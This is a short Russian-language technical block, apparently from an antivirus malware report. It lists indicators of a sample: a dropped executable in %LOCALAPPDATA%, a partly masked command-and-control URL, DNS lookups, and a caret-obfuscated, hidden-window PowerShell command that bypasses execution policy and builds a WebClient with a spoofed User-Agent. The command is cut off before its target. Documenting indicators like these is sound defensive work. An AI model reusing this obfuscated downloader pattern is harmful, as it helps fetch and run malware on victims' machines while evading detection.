Техническая информация
- '%LOCALAPPDATA%\tempbin94.exe'
- %LOCALAPPDATA%\tempbin94.exe
- http://nu###gon.top/perik493/main.php
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK nu###gon.top
- DNS ASK in##l.com
- DNS ASK su####t.apple.com
- DNS ASK support.microsoft.com
- DNS ASK le####piret.best
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c kLZGqofunNeYcpv & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c kLZGqofunNeYcpv & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....